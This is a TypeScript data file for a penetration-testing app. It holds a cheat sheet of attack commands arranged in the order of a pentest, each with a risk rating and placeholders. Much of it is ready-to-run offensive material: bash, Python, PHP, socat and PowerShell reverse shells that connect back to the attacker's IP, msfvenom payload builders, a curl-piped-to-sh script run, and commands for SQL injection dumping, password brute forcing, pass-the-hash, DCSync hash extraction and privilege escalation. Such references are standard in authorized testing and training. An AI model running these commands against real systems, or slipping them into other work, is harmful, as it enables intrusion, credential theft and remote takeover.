import type { ReferenceSection } from "@/types";

/**
 * A–Z quick-reference command cheat sheets (spec §23, §48), ordered by the
 * pentest flow. Placeholders are standardized so the Target bar auto-fills them:
 *   <TARGET> <IP> <DOMAIN> <PORTS> <PORT> <USER> <PASS> <YOUR_IP> <WORDLIST>
 * Judgment placeholders (<hash>, <file>, <share>, <url>, <product>…) stay
 * highlighted for you to fill. Everything here is searchable.
 */
export const REFERENCE: ReferenceSection[] = [
  {
    id: "nmap",
    title: "Nmap",
    icon: "ScanLine",
    intro: "Scan, then read, then decide. Save output with -oA (no subdir needed).",
    entries: [
      { command: "nmap -Pn -sC -sV -oA nmap_initial <TARGET>", description: "Default scripts + versions, top 1000 ports, saved.", risk: "low" },
      { command: "nmap -Pn -p- --min-rate 2000 -oA nmap_all <TARGET>", description: "All 65535 TCP ports, fast.", risk: "low" },
      { command: "nmap -Pn -p <PORTS> -sC -sV -oA nmap_deep <TARGET>", description: "Deep script+version scan of the open ports.", risk: "low" },
      { command: "sudo nmap -sU --top-ports 100 -oA nmap_udp <TARGET>", description: "Top UDP ports (SNMP/DNS/TFTP).", risk: "low" },
      { command: "nmap -Pn -p <PORTS> --script vuln <TARGET>", description: "Run the vuln NSE scripts (leads, not proof).", risk: "medium" },
      { command: "nmap -sn <TARGET>/24", description: "Ping sweep — discover live hosts in the subnet.", risk: "low" },
      { command: "nmap -Pn -A -T4 <TARGET>", description: "Aggressive: OS + version + scripts + traceroute.", risk: "medium" },
    ],
  },
  {
    id: "recon",
    title: "Host Discovery & Recon",
    icon: "Radar",
    entries: [
      { command: "ping -c 3 <TARGET>", description: "Reachability + TTL/OS hint (64≈Linux, 128≈Windows).", risk: "low" },
      { command: "fping -aqg <TARGET>/24", description: "List live hosts in a subnet.", risk: "low" },
      { command: "sudo netdiscover -r <TARGET>/24", description: "ARP-based host discovery.", risk: "low" },
      { command: "sudo arp-scan -l", description: "Discover hosts on the local network.", risk: "low" },
      { command: "whois <DOMAIN>", description: "Domain registration / ownership.", risk: "low" },
      { command: "curl -s 'https://crt.sh/?q=%25.<DOMAIN>&output=json' | jq -r '.[].name_value' | sort -u", description: "Certificate-transparency subdomains (passive).", risk: "low" },
    ],
  },
  {
    id: "dns",
    title: "DNS (53)",
    icon: "Globe",
    entries: [
      { command: "dig <DOMAIN> ANY +noall +answer", description: "Common records for a domain.", risk: "low" },
      { command: "dig axfr @<TARGET> <DOMAIN>", description: "Attempt a full zone transfer (AXFR).", risk: "low" },
      { command: "dig +short -x <TARGET>", description: "Reverse lookup (PTR) for an IP.", risk: "low" },
      { command: "dnsrecon -d <DOMAIN>", description: "Comprehensive DNS enumeration.", risk: "low" },
      { command: "dnsenum <DOMAIN>", description: "Records + subdomain brute forcing.", risk: "low" },
      { command: "subfinder -d <DOMAIN> -silent | httpx -silent -title -tech-detect", description: "Passive subdomains → probe live web hosts.", risk: "low" },
    ],
  },
  {
    id: "http",
    title: "HTTP / Web",
    icon: "Globe",
    entries: [
      { command: "curl -sSIk http://<TARGET>", description: "Response headers only.", risk: "low" },
      { command: "curl -sk http://<TARGET> | head -n 60", description: "Peek at the raw page source.", risk: "low" },
      { command: "whatweb -a 3 http://<TARGET>", description: "Fingerprint technologies (CMS/framework/server).", risk: "low" },
      { command: "curl -s http://<TARGET>/robots.txt", description: "Read robots.txt for hidden paths.", risk: "low" },
      { command: "nikto -h http://<TARGET>", description: "Baseline web server misconfig/vuln scan.", risk: "medium" },
      { command: "gobuster dir -u http://<TARGET> -w <WORDLIST> -x php,txt,html", description: "Directory/file discovery (gobuster).", risk: "medium" },
      { command: "feroxbuster -u http://<TARGET> -w <WORDLIST>", description: "Recursive content discovery.", risk: "medium" },
      { command: "ffuf -u http://<TARGET>/FUZZ -w <WORDLIST> -mc all -fc 404 -t 40", description: "Directory/file discovery (ffuf).", risk: "medium" },
      { command: "ffuf -u http://<TARGET>/ -H 'Host: FUZZ.<DOMAIN>' -w <WORDLIST> -fs <size>", description: "Virtual-host discovery.", risk: "low" },
      { command: "git-dumper http://<TARGET>/.git/ ./loot", description: "Reconstruct source from an exposed .git.", risk: "medium" },
      { command: "wpscan --url http://<TARGET> --enumerate u,vp", description: "WordPress users + vulnerable plugins.", risk: "medium" },
      { command: "nuclei -u http://<TARGET> -severity medium,high,critical", description: "Template-based known-issue scan.", risk: "medium" },
    ],
  },
  {
    id: "webexploit",
    title: "Web Exploitation / Injection",
    icon: "Bug",
    intro: "Validate manually first; these can be intrusive.",
    entries: [
      { command: "curl 'http://<TARGET>/page?file=../../../../etc/passwd'", description: "Path traversal / LFI test.", risk: "medium" },
      { command: "curl 'http://<TARGET>/?cmd=;id'", description: "OS command injection test (benign 'id').", risk: "high" },
      { command: "sqlmap -u 'http://<TARGET>/page?id=1' --batch --level 2 --risk 1 --dbs", description: "Confirm/enumerate SQLi (conservative).", risk: "high" },
      { command: "sqlmap -u 'http://<TARGET>/page?id=1' --batch -D <db> -T <table> --dump", description: "Dump a table once confirmed.", risk: "high" },
      { command: "commix -u 'http://<TARGET>/?q=1'", description: "Automated command-injection testing.", risk: "high" },
      { command: "python3 -m http.server 8000  # host a web shell / payload", description: "Serve an upload/LFI payload from your box.", risk: "low" },
    ],
  },
  {
    id: "ftp",
    title: "FTP (21)",
    icon: "FolderInput",
    entries: [
      { command: "ftp <TARGET>   # user: anonymous", description: "Interactive login — try anonymous.", risk: "low" },
      { command: "nmap -Pn -p21 --script ftp-anon,ftp-syst <TARGET>", description: "Check anonymous access + banner.", risk: "low" },
      { command: "wget -r ftp://anonymous:anonymous@<TARGET>/", description: "Recursively download everything readable.", risk: "low" },
      { command: "curl -u anonymous:anonymous ftp://<TARGET>/", description: "List the root over FTP.", risk: "low" },
      { command: "hydra -L users.txt -P <WORDLIST> ftp://<TARGET>", description: "Credential testing (authorized labs).", risk: "high" },
    ],
  },
  {
    id: "ssh",
    title: "SSH (22)",
    icon: "SquareTerminal",
    entries: [
      { command: "ssh <USER>@<TARGET>", description: "Connect with a password.", risk: "low" },
      { command: "chmod 600 id_rsa && ssh -i id_rsa <USER>@<TARGET>", description: "Authenticate with a discovered private key.", risk: "medium" },
      { command: "ssh <USER>@<TARGET> -p <PORT>", description: "Connect on a non-standard port.", risk: "low" },
      { command: "ssh-audit <TARGET>", description: "Audit the SSH config/algorithms.", risk: "low" },
      { command: "sshpass -p '<PASS>' ssh <USER>@<TARGET>", description: "Non-interactive password login.", risk: "low" },
      { command: "ssh2john id_rsa > hash && john --wordlist=<WORDLIST> hash", description: "Crack a private key passphrase.", risk: "low" },
      { command: "hydra -l <USER> -P <WORDLIST> ssh://<TARGET>", description: "SSH password attack (noisy — authorized only).", risk: "high" },
      { command: "ssh -L 8080:127.0.0.1:80 <USER>@<TARGET>", description: "Local port forward (reach an internal service).", risk: "low" },
      { command: "ssh -D 9050 <USER>@<TARGET>", description: "Dynamic SOCKS proxy for pivoting (+ proxychains).", risk: "low" },
    ],
  },
  {
    id: "smtp",
    title: "SMTP (25)",
    icon: "Mail",
    entries: [
      { command: "nmap -Pn -p25 --script smtp-commands,smtp-enum-users <TARGET>", description: "Banner + user-enum via SMTP.", risk: "low" },
      { command: "smtp-user-enum -M VRFY -U users.txt -t <TARGET>", description: "Harvest valid usernames (VRFY).", risk: "medium" },
      { command: "nc -nv <TARGET> 25", description: "Manual banner grab / VRFY.", risk: "low" },
      { command: "swaks --to user@<DOMAIN> --server <TARGET>", description: "Send a test email / relay check.", risk: "low" },
    ],
  },
  {
    id: "snmp",
    title: "SNMP (161/udp)",
    icon: "Network",
    entries: [
      { command: "snmpwalk -v2c -c public <TARGET>", description: "Walk the MIB with a community string.", risk: "low" },
      { command: "snmpwalk -v2c -c public <TARGET> 1.3.6.1.4.1.77.1.2.25", description: "Enumerate Windows users via SNMP.", risk: "low" },
      { command: "onesixtyone -c community.txt <TARGET>", description: "Brute-force community strings.", risk: "medium" },
      { command: "snmp-check <TARGET>", description: "Readable SNMP summary (users/processes/software).", risk: "low" },
    ],
  },
  {
    id: "smb",
    title: "SMB (139/445)",
    icon: "Server",
    entries: [
      { command: "nxc smb <TARGET>", description: "Banner: OS, hostname, domain, signing.", risk: "low" },
      { command: "nxc smb <TARGET> -u '' -p '' --shares", description: "List shares via a null session.", risk: "low" },
      { command: "nxc smb <TARGET> -u <USER> -p <PASS> --shares", description: "List shares with credentials.", risk: "low" },
      { command: "smbclient -N -L //<TARGET>/", description: "List shares (smbclient, no creds).", risk: "low" },
      { command: "smbclient -N //<TARGET>/<share>", description: "Browse a specific share.", risk: "low" },
      { command: "smbmap -H <TARGET> -u <USER> -p <PASS>", description: "Show share permissions at a glance.", risk: "low" },
      { command: "enum4linux-ng -A <TARGET>", description: "Users, groups, shares, and password policy.", risk: "low" },
      { command: "nxc smb <TARGET> -u <USER> -p <PASS> --rid-brute", description: "Enumerate domain users via RID cycling.", risk: "low" },
      { command: "nxc smb <TARGET> -u <USER> -H <hash>", description: "Pass-the-hash authentication.", risk: "high" },
      { command: "impacket-psexec <DOMAIN>/<USER>:<PASS>@<TARGET>", description: "SYSTEM shell via SMB (admin creds).", risk: "high" },
    ],
  },
  {
    id: "ldap",
    title: "LDAP (389/636)",
    icon: "Network",
    entries: [
      { command: "ldapsearch -x -H ldap://<TARGET> -s base namingcontexts", description: "Find the base DN (naming context).", risk: "low" },
      { command: "ldapsearch -x -H ldap://<TARGET> -b '<BASE_DN>' '(objectClass=user)' sAMAccountName description", description: "Enumerate users + descriptions (base DN e.g. DC=corp,DC=local).", risk: "low" },
      { command: "nxc ldap <TARGET> -u <USER> -p <PASS> --asreproast asrep.txt --kerberoast kerb.txt", description: "Pull AS-REP + Kerberoastable hashes.", risk: "medium" },
      { command: "ldapdomaindump -u '<DOMAIN>\\<USER>' -p '<PASS>' <TARGET>", description: "Dump the directory to browsable HTML/JSON.", risk: "low" },
      { command: "windapsearch -d <DOMAIN> -u <USER> -p <PASS> --dc-ip <TARGET> -U", description: "Enumerate users over LDAP.", risk: "low" },
    ],
  },
  {
    id: "rpcnfs",
    title: "RPC / NFS (111/2049)",
    icon: "Network",
    entries: [
      { command: "rpcinfo -p <TARGET>", description: "List RPC services (portmapper).", risk: "low" },
      { command: "showmount -e <TARGET>", description: "List NFS exports.", risk: "low" },
      { command: "sudo mount -t nfs <TARGET>:/<share> /mnt/nfs -o nolock", description: "Mount an NFS export to inspect it.", risk: "low" },
      { command: "rpcclient -U '' -N <TARGET>", description: "Null RPC session (then: enumdomusers, querydispinfo).", risk: "low" },
    ],
  },
  {
    id: "rdp",
    title: "RDP (3389)",
    icon: "Monitor",
    entries: [
      { command: "nxc rdp <TARGET> -u <USER> -p <PASS>", description: "Test whether creds grant RDP (mind lockouts).", risk: "medium" },
      { command: "xfreerdp /u:<USER> /p:<PASS> /v:<TARGET> /cert:ignore /dynamic-resolution", description: "Interactive RDP session.", risk: "medium" },
      { command: "rdesktop -u <USER> -p <PASS> <TARGET>", description: "Alternative RDP client.", risk: "medium" },
      { command: "hydra -l <USER> -P <WORDLIST> rdp://<TARGET>", description: "RDP password attack (lockout risk — authorized only).", risk: "high" },
    ],
  },
  {
    id: "winrm",
    title: "WinRM (5985/5986)",
    icon: "SquareTerminal",
    entries: [
      { command: "nxc winrm <TARGET> -u <USER> -p <PASS>", description: "Test WinRM access for a credential.", risk: "medium" },
      { command: "evil-winrm -i <TARGET> -u <USER> -p <PASS>", description: "Interactive PowerShell shell over WinRM.", risk: "medium" },
      { command: "evil-winrm -i <TARGET> -u <USER> -H <hash>", description: "WinRM via pass-the-hash.", risk: "high" },
      { command: "evil-winrm -i <TARGET> -u <USER> -p <PASS> -S", description: "WinRM over HTTPS (5986).", risk: "medium" },
    ],
  },
  {
    id: "databases",
    title: "Databases",
    icon: "Database",
    entries: [
      { command: "mysql -h <TARGET> -u root -p", description: "MySQL/MariaDB — try weak/blank root.", risk: "medium" },
      { command: "nxc mysql <TARGET> -u root -p ''", description: "Test MySQL blank root remotely.", risk: "medium" },
      { command: "impacket-mssqlclient <USER>@<TARGET> -windows-auth", description: "MSSQL with Windows auth (then xp_cmdshell if sysadmin).", risk: "high" },
      { command: "nxc mssql <TARGET> -u <USER> -p <PASS> -x whoami", description: "MSSQL: test creds + command exec.", risk: "high" },
      { command: "psql -h <TARGET> -U postgres", description: "PostgreSQL — try postgres/weak creds.", risk: "medium" },
      { command: "redis-cli -h <TARGET>", description: "Redis — often unauthenticated (INFO, CONFIG GET dir).", risk: "medium" },
      { command: "mongosh --host <TARGET>", description: "MongoDB — older deployments allow anon access.", risk: "medium" },
    ],
  },
  {
    id: "ad",
    title: "Active Directory",
    icon: "Network",
    intro: "53+88+389+445 together ≈ a Domain Controller.",
    entries: [
      { command: "kerbrute userenum -d <DOMAIN> --dc <TARGET> users.txt", description: "Validate usernames via Kerberos (pre-auth).", risk: "low" },
      { command: "impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -no-pass -dc-ip <TARGET>", description: "AS-REP roast (no creds needed).", risk: "medium" },
      { command: "impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <TARGET> -request", description: "Kerberoast SPN (service) accounts.", risk: "medium" },
      { command: "bloodhound-python -u <USER> -p <PASS> -d <DOMAIN> -ns <TARGET> -c All", description: "Collect AD data for BloodHound.", risk: "low" },
      { command: "certipy find -u <USER>@<DOMAIN> -p <PASS> -dc-ip <TARGET> -vulnerable", description: "Find vulnerable ADCS certificate templates.", risk: "medium" },
      { command: "impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<TARGET> -just-dc", description: "DCSync — dump all domain hashes (with rights).", risk: "critical" },
    ],
  },
  {
    id: "passwords",
    title: "Passwords, Hashes & Brute Force",
    icon: "KeyRound",
    entries: [
      { command: "hashid '<hash>'", description: "Identify a hash type (→ hashcat mode).", risk: "low" },
      { command: "hashcat -m 1000 hashes <WORDLIST> -r /usr/share/hashcat/rules/best64.rule", description: "Crack NTLM hashes.", risk: "low" },
      { command: "hashcat -m 1800 hashes <WORDLIST>", description: "Crack Linux sha512crypt ($6$) shadow hashes.", risk: "low" },
      { command: "hashcat -m 13100 kerb.txt <WORDLIST>", description: "Crack Kerberoast (TGS) hashes.", risk: "low" },
      { command: "hashcat -m 18200 asrep.txt <WORDLIST>", description: "Crack AS-REP hashes.", risk: "low" },
      { command: "unshadow /etc/passwd /etc/shadow > hashes && john --wordlist=<WORDLIST> hashes", description: "Crack Linux logins with John.", risk: "low" },
      { command: "nxc smb <TARGET> -u users.txt -p '<PASS>' --continue-on-success", description: "Password spray one password across users (check lockout!).", risk: "high" },
      { command: "nxc smb <TARGET> -u <USER> -H <hash>", description: "Pass-the-hash (reuse before cracking).", risk: "high" },
    ],
  },
  {
    id: "linux",
    title: "Linux Enumeration",
    icon: "Terminal",
    entries: [
      { command: "id; whoami; hostname; uname -a", description: "Identity, host, and kernel.", risk: "low" },
      { command: "cat /etc/os-release", description: "Distribution and version.", risk: "low" },
      { command: "sudo -l", description: "What you can run via sudo (top privesc check).", risk: "low" },
      { command: "cat /etc/passwd", description: "Local users and shells.", risk: "low" },
      { command: "ss -tulpn; ps auxww", description: "Listening services and processes.", risk: "low" },
      { command: "find / -perm -4000 -type f 2>/dev/null", description: "SUID binaries.", risk: "low" },
      { command: "find / -perm -2000 -type f 2>/dev/null", description: "SGID binaries.", risk: "low" },
      { command: "getcap -r / 2>/dev/null", description: "File capabilities (cap_setuid ≈ root).", risk: "low" },
      { command: "cat /etc/crontab; ls -la /etc/cron.*", description: "Scheduled jobs.", risk: "low" },
      { command: "find / -writable -type f 2>/dev/null | grep -vE '^/(proc|sys)'", description: "Writable files (filter noise).", risk: "low" },
    ],
  },
  {
    id: "linuxpriv",
    title: "Linux PrivEsc",
    icon: "TrendingUp",
    entries: [
      { command: "curl -s http://<YOUR_IP>:8000/linpeas.sh | sh | tee linpeas.out", description: "Run linPEAS and save output.", risk: "low" },
      { command: "./pspy64", description: "Watch processes/cron without root.", risk: "low" },
      { command: "sudo find . -exec /bin/sh \\; -quit", description: "GTFOBins escape when you can sudo find.", risk: "high" },
      { command: "openssl passwd -1 -salt x pass123", description: "Make a root hash for a writable /etc/passwd.", risk: "high" },
      { command: "/usr/bin/python3 -c 'import os;os.setuid(0);os.system(\"/bin/sh\")'", description: "Abuse cap_setuid on python.", risk: "high" },
      { command: "./linux-exploit-suggester.sh", description: "Suggest kernel exploits (last resort).", risk: "medium" },
    ],
  },
  {
    id: "windows",
    title: "Windows Enumeration",
    icon: "MonitorCog",
    entries: [
      { command: "whoami /priv", description: "Token privileges (SeImpersonate = gold).", risk: "low" },
      { command: "whoami /groups", description: "Group memberships.", risk: "low" },
      { command: "whoami /all", description: "User, groups, and privileges together.", risk: "low" },
      { command: "systeminfo", description: "OS build, patches, domain membership.", risk: "low" },
      { command: "net user; net localgroup administrators", description: "Users and local admins.", risk: "low" },
      { command: "ipconfig /all; route print", description: "Network config and routes.", risk: "low" },
      { command: "netstat -ano", description: "Connections + listening ports with PIDs.", risk: "low" },
      { command: "tasklist /v", description: "Running processes and owners.", risk: "low" },
      { command: "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"", description: "Check for autologon credentials.", risk: "low" },
    ],
  },
  {
    id: "windowspriv",
    title: "Windows PrivEsc",
    icon: "TrendingUp",
    entries: [
      { command: "winPEASx64.exe > winpeas.txt", description: "Run winPEAS (services, privs, creds).", risk: "low" },
      { command: "reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated", description: "MSI-as-SYSTEM policy check (both hives = 0x1).", risk: "medium" },
      { command: "PrintSpoofer.exe -i -c cmd", description: "SeImpersonate → SYSTEM shell.", risk: "high" },
      { command: "GodPotato -cmd \"cmd /c whoami\"", description: "Modern potato for SeImpersonate.", risk: "high" },
      { command: "powershell -ep bypass -c \". .\\PowerUp.ps1; Invoke-AllChecks\"", description: "Automated Windows privesc checks.", risk: "medium" },
      { command: "accesschk.exe -uwcqv Users *", description: "Find services your user can modify.", risk: "medium" },
      { command: "impacket-secretsdump -sam sam.save -system system.save LOCAL", description: "Extract local hashes from saved hives.", risk: "high" },
    ],
  },
  {
    id: "revshells",
    title: "Reverse Shells",
    icon: "Terminal",
    intro: "Start the listener first. Use your tun0 IP as <YOUR_IP>.",
    entries: [
      { command: "nc -lvnp 4444", description: "Listener to catch the shell (run on YOUR box).", risk: "low" },
      { command: "bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1'", description: "Bash reverse shell (Linux target).", risk: "high" },
      { command: "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"<YOUR_IP>\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];subprocess.call([\"/bin/sh\",\"-i\"])'", description: "Python reverse shell (Linux target).", risk: "high" },
      { command: "php -r '$s=fsockopen(\"<YOUR_IP>\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", description: "PHP reverse shell.", risk: "high" },
      { command: "socat TCP:<YOUR_IP>:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane", description: "Socat fully-interactive reverse shell.", risk: "high" },
      { command: "powershell -nop -c \"$c=New-Object Net.Sockets.TCPClient('<YOUR_IP>',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$sb2=$sb+'PS '+(pwd).Path+'> ';$sby=([Text.Encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()}\"", description: "PowerShell reverse shell (Windows target).", risk: "high" },
      { command: "msfvenom -p linux/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f elf -o shell.elf", description: "Generate a Linux reverse-shell binary.", risk: "high" },
      { command: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f exe -o shell.exe", description: "Generate a Windows meterpreter payload.", risk: "high" },
    ],
  },
  {
    id: "shells",
    title: "Shell Stabilization",
    icon: "SquareTerminal",
    entries: [
      { command: "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'", description: "Spawn a PTY.", risk: "low" },
      { command: "stty raw -echo; fg", description: "After Ctrl-Z: get a full interactive terminal.", risk: "low" },
      { command: "export TERM=xterm", description: "Fix clear/less/editors.", risk: "low" },
      { command: "stty rows <R> cols <C>", description: "Match your terminal size (get with `stty size`).", risk: "low" },
      { command: "script /dev/null -c bash", description: "Alternative PTY upgrade.", risk: "low" },
    ],
  },
  {
    id: "filetransfer",
    title: "File Transfer",
    icon: "ArrowLeftRight",
    entries: [
      { command: "python3 -m http.server 8000", description: "Serve the current dir over HTTP (on your box).", risk: "low" },
      { command: "impacket-smbserver share . -smb2support", description: "Quick SMB server (smooth for Windows).", risk: "low" },
      { command: "wget http://<YOUR_IP>:8000/<file>", description: "Pull a file (Linux).", risk: "low" },
      { command: "curl http://<YOUR_IP>:8000/<file> -o <file>", description: "Pull a file (Linux, curl).", risk: "low" },
      { command: "certutil -urlcache -f http://<YOUR_IP>:8000/<file> <file>", description: "Download a file (Windows, stock).", risk: "low" },
      { command: "powershell iwr http://<YOUR_IP>:8000/<file> -OutFile <file>", description: "Download a file (Windows PowerShell).", risk: "low" },
      { command: "scp <file> <USER>@<TARGET>:/tmp/", description: "Copy over SSH.", risk: "low" },
    ],
  },
  {
    id: "pivot",
    title: "Pivoting & Tunneling",
    icon: "Share2",
    entries: [
      { command: "ssh -L <lport>:127.0.0.1:<rport> <USER>@<TARGET>", description: "Local forward: reach an internal service.", risk: "low" },
      { command: "ssh -D 9050 <USER>@<TARGET>", description: "SOCKS proxy (pair with proxychains).", risk: "low" },
      { command: "chisel server -p 8000 --reverse", description: "Chisel server on your box…", risk: "low" },
      { command: "./chisel client <YOUR_IP>:8000 R:socks", description: "…and reverse SOCKS from the target.", risk: "low" },
      { command: "socat TCP-LISTEN:<lport>,fork TCP:<TARGET>:<rport>", description: "Simple port relay.", risk: "low" },
      { command: "proxychains -q nxc smb <internal-ip>", description: "Run tools through your SOCKS proxy.", risk: "low" },
    ],
  },
  {
    id: "metasploit",
    title: "Metasploit",
    icon: "Crosshair",
    entries: [
      { command: "msfconsole -q", description: "Start the console.", risk: "low" },
      { command: "search <product> <version>", description: "Find candidate modules.", risk: "low" },
      { command: "use <module>; info; show options", description: "Select a module and read its options.", risk: "low" },
      { command: "set RHOSTS <TARGET>; set LHOST <YOUR_IP>; check; run", description: "Configure and run (check first when possible).", risk: "high" },
      { command: "use exploit/multi/handler; set payload <payload>; set LHOST <YOUR_IP>; set LPORT 4444; run", description: "Catch a reverse shell/meterpreter.", risk: "high" },
      { command: "sessions -i 1", description: "Interact with a session (Ctrl-Z to background).", risk: "medium" },
      { command: "run post/multi/recon/local_exploit_suggester", description: "Suggest local privesc from a session.", risk: "low" },
    ],
  },
  {
    id: "wordlists",
    title: "Wordlists & Setup",
    icon: "BookMarked",
    entries: [
      { command: "sudo gzip -dk /usr/share/wordlists/rockyou.txt.gz", description: "Unpack rockyou (Kali).", risk: "low" },
      { command: "ls /usr/share/seclists/Discovery/Web-Content/", description: "Common content-discovery wordlists (SecLists).", risk: "low" },
      { command: "sudo apt install seclists", description: "Install SecLists if missing.", risk: "low" },
      { command: "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt", description: "Subdomain/vhost wordlist.", risk: "low" },
    ],
  },
];

export const REFERENCE_MAP: Record<string, ReferenceSection> = Object.fromEntries(
  REFERENCE.map((s) => [s.id, s])
);
